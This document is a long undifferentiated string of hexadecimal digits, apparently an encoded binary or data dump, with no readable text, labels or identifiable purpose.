1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700C31227A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700B31A27615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700A3BD27A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700B39227615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700A3BD27A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700A3D527615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700A31127A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700933927615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700937427A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700839C27615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A000009482070083D727A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A070073FF27615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700733B27A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A070073F327615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A000009482070063FD27A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700637627615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A000009482070063D027A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700531927615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700537327A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A070043BB27615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700433627A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700338D27615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700330827A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700235F27615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700235927A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700239127615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700133B27A00010D182C1F10011000034000010C7004003B11000005400000001000010D60000107500000061000000000000C11400A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700133327615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700032A27A00010048207000329270011000034000010F7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700038127615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700F24C27A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700F2F327615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700E2FE27A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700E2F627615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700E21227A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700D21A27615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700D27327A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700C2BB27615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700B21E27A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700C2D327615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700B21E27A00010D182C1F10011000034000010C7004003B11000005400000001000010A60000107500000031000000000000C114A20000EDA00000358200E031A0000043825201ED0000FFFFEF0EE36011701170316D7170110000400000B008A000009482D011400000B0E7D031A00000B7822A0700429527C1522A5011B1522A0700427427A1522A401191522A0700B21D2781522A9071522A0700B27527615210000004D8D1D4C2C011C031F530EF61A000006582610700103327501130EF61A00000658261070010332740110050316000005F82A0000087F6600010D1F60700B29327701180A00000BE820002B20000005031600000CC829011A0000087F65011A00000BE8261C2B011B03110EF61A011A03110EF4190119031600000BC82A000000FF6A00010F3F6A00010E3826034C280118031600000AC8250115031600010D1F60700B293277011804031600010D1F60700B2B127701180D0600010D1F60700B2502770118000001071837031616031AD71600010B1F68062600010A1F60700A27F2780C0600010F13760000010649370B0A00000B5826000A0A0000094820700A2FA27A00010D182C1F10011000034000010C7004003B110000054F100E9980051000000000110A26000B2A0800000EDA000003582C04100A000000B82A00010D3F68011008031A00000438252F1EDC070117031A00000A7F6600000DBF6401150114170306011A0000028826031600000CB3700A00000C882AD96E8401196E890615011619000A00000C88201F1614011AD01F196E89090503110000065D86D71AD71AD96E8401196E890403110000065D801F100A00000C882ADF0F196E8206190F0F120D010000065D86D71AD71ADF0F196E8200000A00000C882C0F161709120B010000065D8C0F100110000240000004C007003B11000005402009EE000BD00000000000071004AD5007400200000C1100000A26000B2A04011000000EDA00000358240314100A000000B82A00010D3F6E01100E031A0000043825202ED4031A00010B282614170110000A00000C882ADB196E880617011B180703110000065D86D71AD71ADB196E880CD00A0000010F610000051578011D0C21000005157801171ED0BD2D011D031A00000FAF68011000000C0A000003982A00010C3F6A00010B3F671A00010A3F6A01191C2C011C031B011B031A0001093F6A011A0311000001B4790119031A00000B382A00000DAF6801134B28031A0001083F660116031A000107382A000001F8270A000106337E10700A2F72700000000DD830040314190C25011503190D010EF61A00000B58270C010000065D861B0A0000094820700A2562720001100001400001021006003B10000A26000B2A0610050B2A07140C270B010EF61A000006582610700A2D527A0001053F691612000110000B2000000620030033100A26000B2A07079133111411141316D714111B0A000009482A00010F08271217131A00010E082494111B0117000E9AD4941119011494111A0114111B0110021B200E9AD49411190116D000000FF02494111A0114111B01191C2611161315111513140EF61AD4941119011494111A01136B24131613131AD71AD7196E8A011B031100000E4D86D71AD7196E8A0111E131111211121316D712111E91649AD712111804921118011AD712111A01191B22131711131AD7196E88011A031100000E4D86D71AD7196E88011FBD20111013120EF96E88096E8801100C0F01100A00000C88296E88096E880F011618000A00000C88296E88061F0116180F031100000E4D86D71AD718D8196E88023B200A00000C882AD7196E88011719011718011E9164011496180116190119031100000E4D86D71AD7196E880119D13D011E011E0316D71E01170316D817011E9A00010438201F1A0001053F681701130E011801112B2E03161D031AD7160118031100000E4D86D71AD71601170316160317BA000007982B5040000000000000032C6A00000AFF63000004031A00010438201F10700A27527C09011C2C011C0315011503110EF71204031A00010438201F10700A21527D0A00010C1824000006A0D52100000E4D8E1C0A00010C1824000007A0D52100000E4D8E1B007001033270011000004000010BE006003311000005400000001000030CE000030BE0000001000000000100000540000000100000052000000B0000000A100000000000043140000A20000EDA000003582003331A0000043825201ED0000FFFFDF60A32311233140EF96E8C011D011D0316D71D0110000A0000006F62111FFFFDF1CE3A111B111B1316D71B11100613107001033270090B2000000D1B200400000B008A0000094821311400000B0E71331A00000B7822A0700429527A1522AA000000A826000009C82C21181110700A2D32791522A070020492781522AA000000A8201110700A2522771522A0700923B27615210000004D8B1C231A000008AF60700103327070092FA27C2110007B20030C203110331F510EF61A000006582610700103327C21110EF61A0000065826107001033270111EBD2F211F2316110B240EFF7F119A2114111B01302F119A211411100A2316D71A211C231A000009482A00010F082F121E211F131A00010E08219A2114111E231C21172B2C23107001033270000A2316D81B11170C2D211D231B211B23110EF618111A2316D90F1B111000010509392119231821182316110B27110B2A0001033F607009259276111E0D2A0001033F607009238276111F1C2511100000010938300B1313211513171EBD2721172316110B240EFF7F11932114111B01302F119321141110032316D7132110231A000009482A00010F082F1216211F131A00010E08219321141116231021172B2000032316D81B11170C2521152314211423110EF61811132316D90F1B111F6C222112231121112317110B2A0001033F6070092B6276111E0D2A0001033F6070092B5276111023107001033276131A000009482A00010F082F121E111F131A00010E08219B1114111E13161110000109F93D111D131C111C1316110B210EF6110EFD3F119B1114111E0F2F7F119B1114111711302F119B11141110000206383B13161A131AD713111008131710050B20081316160C2911191317111713110EF0000000D021961411162A0001023F63111614111211161310700103327513161413110000065D86D71AD71311131317BA0001013F621112131A0001003379111111131A000009482070092D227E0110131A000003FF66D71A00010D2F60700929227E011E011F031A00000CE37E011E031A9D011C0110000209E83D03161C031A00010F28270000030B093B011B031A000005D8270B0A0000094820700927127A000008AF60700103327070011C827A00010E2F6A00010D2F6070082FF277070000020B200000020B200B0A00000E3F69011B0C2A011A03130EF4190119031A00000B382A0001062F6070010332780D2C28011803130EF4180C0A0001032F60700821927A00010C2E7B0070010332700A00000EF820000318802ACD27011703140EF96E890401140316D714011000000EDA000003582006031A0000043825201ED00A0000075F65011005031A940119092B2403161D060A0A00000958207008218270000110000F3000030EF006003B1000000A26000B2A070B0A000008AF60700103327A000108282A0001072826170B0A00000A7F6A00010B282614180A00000288200A00010B182AD7196E82061807120C010000065D86D71AD8196E82000110000E3000000D40060033100000000000000E0000020FF000020930000006C000000201000005400000061000020A40000007400002030000000001000005400000061000010EC0000007400001078000000000000C4140000A26000B2A0A00010A23770FFFFDFE4A3E111E13140EF96E88011901190316D719011000000FFFFDFE8A3D111D13140EF96E8C011D011D0316D71D01100CD00A0000010F6F01180C2F01100E0ED000000A0001092F64111700060001031F60700821727411100600010F0F6A000008AF60700103327A000108282A000107282614011411100600010D0F6A000008AF60700103327A000108282A00010728261A0000058F6A00000A7F65011011141110060001011F6A000008AF60700103327070082D627A00000A7F66011011141114131600010B037006031A0000087F6070082D52701110001B2000000EDA0000035826031B10000B047311100A00000438261ED6031B10000B0473131A00000B382A961A111B0B220D21961B111A000007B82B13152C971615210000008D8714141A131522A3111615210000030D87107008233274101110016C2C111C13130EF4131113131A00000B382A0001062F60700825427F0110000EDA0000035825031B10000B047211100A00000438261ED5031B10000B0472131A00000B382A961A111B0B220D21961B111A000007B82B13152C971615210000008D8714141A131522A2111615210000030D8710700823327410111002131A00000B382A0001062F60700827227F0119BD29111913140EF96E85111611161316D71611100000040316000006C8290D0B10000B047A0001062F67111F01181C28111813130EF41A0001062F67111F0117131A96111511193B26131615131800000107D9311111131F50630EF41A0001062F6070042BF27F0110630EF41A0001062F6070042FD27F0110630EF41A0001062F60700423C27F01130EF41A0001062F60700427A27F01130EF41A0001062F60700827227F0110131A000105237F031A0001032F6E011A01100E031A9D011C0110000201683D03161C031A0001042F6A0110000204893B011B03130EF41A011A031A9901180110000201A839031618031701170312AA0001032F60700724727A00000C6E791522AA0001032F60700621C27A00000C6E781522AA0001032F6070052AC27A00000C6E771522AA0001032F60700527127A00000C6E76152100000A5D8A1403141C02A070042BF2791522A070042FD2781522A0700423C2771522A0700427A27615210000004D8A1B0A00010E13700110000D3000030A400A003B100000000F00079A700D1002000000110A2000020B200CD00A0000010F6B10000D061EF2021F0ED19D250115031A000102282202100400000B008A0000094824011400000B0E74031A00000B7822A0700429527C1522A600010E0F690B1522A0700427427A1522A600010C0F69091522A070042132781522A60001001F69071522A0700325B27615210000004D8D1D0A000101282202126B2C0A0001002F660000000C89370B020EF61A00010F1F660A06000005C82A0A00010E13700110000C3000000CA004003B1000000A2400000A60861400000960861400000860807001033274000005608A00010D182A1F14000004608C9E1915210000065D8A14000003608A00010C1824000004A0D5210000065D8B0F100000000000000940040033100A26000B2A080ABD2F011F03140EF96E8A011B011B0316D71B011000000D06D96E8C0119000A00010B18296E8C011908061C01171C2E011E03110EF61D011D03110EF41C011C031A9B011A01183B2B03161A03130D061C010000065D86D71AD716D71AD71709CD29011903140EF96E84011501150316D715011000000B06D96E860117080C28011803110EF617011703110EF4160116031A95011401192B2503161403130B06100110000B30000007A00500331A26000B2A0401100A7A000109137A000000A821000006AC880070032742761C2701170315011503130EF6180C06000002B8261102196E8401140114030403110000065D86D71AD717000A7A000109137A000000A821000006AC8800700222C2761C26011603190D030EF6180C06000002B8261102161414030B06100110000A3000000C700600331A26000B2A09000A7A000109137A000000A821000006AC85011070022852771C2701170316011603130EF61501150316000004B826196E84011401180905040000084E7A0001070E73040316000002C822A4091522AA00010318296E84081522AA0001031827171522A40000034E76152B10000B0D8A120D0A00010518280C0A00010A1826170B06000001C8240000044E7302000110000930000004900900331A26000B2A07000A7A000109137A000000A821000006AC880070012562761C2701170315011503130EF6180C06000003B826196E84011401140000074E7704031A0000087F650A000002B8200A7A000109137A000000A821000006AC8800700022E2761C26011603190D030EF6180C06000000B826140301021B0A0001070E70011000083000000080050033100A26000B2A0A00010A18261C919D1709152C919C1708152C919B1707152C919A170615210000065D8A1B06000001C8240000064E7302000110000730000007300500331000000000100DFBC00230020000001100000A26000B2A05011626000001B82617000A00010818290626000005B8280CD00A0000010F62000003161EF60210001ED00A7A000109137A000000A821000006AC89011070002C72771C2F011F031C011C03130EF61901100A7A0001091370700024127B0C2E011E031B011B03110EF400000D4E7901190316000007B8261802196E85011501196E870117011402196E840E040E080503110000065D86D71AD71801100A7A000109137A000000A821000006AC890110700F1692771C2D011D031A011A03130EF61901190316000007B82618021614196E870117011402196E840E040E080803161703110000065D86D71AD71600000EB82702060314011006000009B8250E050404021D06000000C822021307020B0600000FB8240000054E7400000A4E740000094E7200011000063000010A200A003B10000A2000000A00010818240000085B720D0C27011703190D0A000107182A0001070E740000085B720000000A00010818240000045B720D0C26011603180C0A000107182A0001070E740000045B720000000A00010818240000065B720D0C25011503170B0A000107182A0001070E740000065B720000000A00010818240000025B720D0C24011403160A0A000107182A0001070E740000025B7200011000053000000A900200331000000A2000040000085D7A00010518240000095B7202040000095D796E8502000A00010618240000075B72040000065B720615040000065D7A00010518240000075B7202040000075D796E8502094C25011503180C030EF4150000000A00010618240000055B72040000045B720614040000045D7A00010518240000055B7202040000055D796E84020F2C24011403170B030EF4140000000A00010618240000035B72040000025B720613040000025D7A00010518240000035B7202040000035D796E83020F2C290D060A030EF413040000005D7A000104182A00000D282200000310D2040000015D7400000C4E7202000003151EF2000110000430000005F00400331A2400000D4080C000A2002400000C40871400000B40871400000A4080700F1C52740000094080700F1452740000084080700F1C32740000074080700F1222740000064080700F1602740000054080700E16E2740000044080700E1CC274000003408A000103182D42444B40200000000000000C600100331A200A00010208200600000E9F66000002937600000F560EF41400000F1E700600000C9F66000002937600000E560EF41400000F1E7400000F1086000001A3700000000000000000400300331006AB20000A00000EF820000308E0200000000400000A3D7A000006EF66020D0C280C030EF61A00000658261400000A3B720A000006EF66082C270B020EF6160000026820000100002606000001682A0A0001021370000100002000011000033000000B50030033100A200A00000AEF660A0A000009E37A000008E376000007A60EF200011000062000000B10020033110000054010017070010000000000110A26000B2A0A00010C0F61000004161EFB021B03148300000EDA00000358200A031A0000043825252EDA0A000006EF670626000006682801161B170804011308031A0001001826000005682701170316000004682602150116031615031600000168240316000008682613000A6EDA0070010332780C29011903110EF6190D0600000768280C010000065D8000000FF02B0A00000743700001100002300000089007003B11000005494001EDA0043000000000110A26000EDA000003582A0A0000026F6A00010F08280218031A00010E0823000D1EDA000003582A0A00010D0F6A00010F08280218031A00010E08230C1C27011703170006031A0000043825294EDA06000004A828B30200055EDA0A00010D0F66000004A828B302001C2501150317000D6EDA00700E10C270067EDA00700E12B2700F7EDA00700E1EA270000000088DDA0A0000056820700E1AA27A00010C0F61000004161EF10F00700E16A2700E3B22063B0F19507F1401100B2D0E2E2F1401115B251E232F1401100B204E202F14011010332F1401176B275E2D0F1401100B286E290F1401100B2B3E2E140117103D0F140114031300000000000B0710040B200B06150C290D070F0C280C0A00010B0F6A0001090F66000004082B0A00010A0F6A0001090F660000040820011000013000010C2003003B1000000A26000B2A0600000A98250403040000093B7200000000060000059F660000069376000003A82A45020A45020501181C250115031400000D3B72052C24011403110EF00001040024033B2000060000059F660000069376000003A82A45020A450209071C290D0400000C3B72042C280C010EF00001000024046C270B010EF613000110000030000001800500331000000A2006000005A8220000010C260A0A000108082A0001070E740000093B72040000093D7600000998261A0001070E740000083B720D0F12040000083D76000008A376000002A60EF202000A00000A3822000110000700000001500500331A26000B2A0400000A3B72000110000A0000000C000100331000000A2FD337060A0B2000030827080400000D3C720C0200000C047A0001060823070B060A0400000D3B720110000F20000009200300331000000A2FD337060A0B2000030827080400000D3C720C0200000C047A0001040823070B060A0400000D3B720110000F20000009200300331000000A2FD337060A0B2000030827080400000C3C720C0200000C047A0001060823070B060A0400000C3B720110000F20000009200300331000000A2FD337060A0B2000030827080400000C3C720C0200000C047A0001040823070B060A0400000C3B720110000F20000009200300331A26000B2A040000073B72000110000A0000000C000100331A26000B2A040000063B72000110000E2000000C000100331A200A00010208200600000A882006000009882006000108282006000102282006000109282006000106282006000105282006000104282006000103282006000101282006000107282006000107082006000003F8200600000FC8200600000EC82006000000D82006000006D82006000004D82006000100082006000001D82006000003D82006000008D8200600000AD82006000005D82006000002D8200600000EF8200600000DC8200600000CF8200600000BF8200600000AF82006000009F82006000006F8200600000EE8200600000DE8200600000CE8200600000BE8200600000AE82006000009E82006000008E82006000007E82006000006E82006000005E82006000004E82006000003E82006000002E82006000001E82006000000E8200600000FD8200600000ED8200600000DD8200600000CD8200600000BD82006000009D82006000007D8200600000FE82006000001F82006000002F82006000000F